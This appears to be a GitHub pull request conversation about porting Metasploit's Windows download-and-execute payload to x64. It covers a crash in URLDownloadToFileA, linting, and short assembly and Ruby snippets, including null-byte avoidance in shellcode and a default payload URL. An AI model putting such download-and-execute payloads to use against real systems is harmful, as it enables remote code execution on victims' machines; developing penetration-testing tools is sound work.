Port payload/windows/download_exec to x64 #20386
Conversation
|
for some reason when running it with c, it crashes during URLDownloadToFileA function call. |
|
Problem likely lies in URLDownloadToFileA, as it is visible in the photo it calls URLDownloadToFileW in URLDownloadToFileA function and it somehow makes the executable crash. 
|
add CachedSize & fix the fifth arg problem & run rubocop
|
@xHector1337 Were you able to resolve this issue? 👀 |
Thanks, I was. |
There was a problem hiding this comment.
Code looks clean and correct, i'll give it a shot this week and if everything works i think we are good to go.
@xHector1337, can you please fix the linting issue?
rubocop -a modules/payloads/singles/windows/x64/download_exec.rb
Thanks!
Thank you, I'll be fixing it immediately. |
| main: | ||
| pop rbp | ||
| call LoadLibrary | ||
| db "urlmon.dllK" |
There was a problem hiding this comment.
Any reason for not just null-terminating inline?
db "urlmon.dll", 0
Then you don't have to do any XOR later?
There was a problem hiding this comment.
I hate null-bytes. That's the reason.
There was a problem hiding this comment.
My intent was avoiding null-bytes as much as possible.
| end | ||
|
|
||
| def generate(_opts = {}) | ||
| url = datastore['URL'] || 'http://localhost/hi.exe' |
There was a problem hiding this comment.
Does it make sense to have a default? Surely a hard failure when not specified or not a valid URL would be better?
I have tried my best to port it from x86 to x64. It has some little problems that I can not see clearly.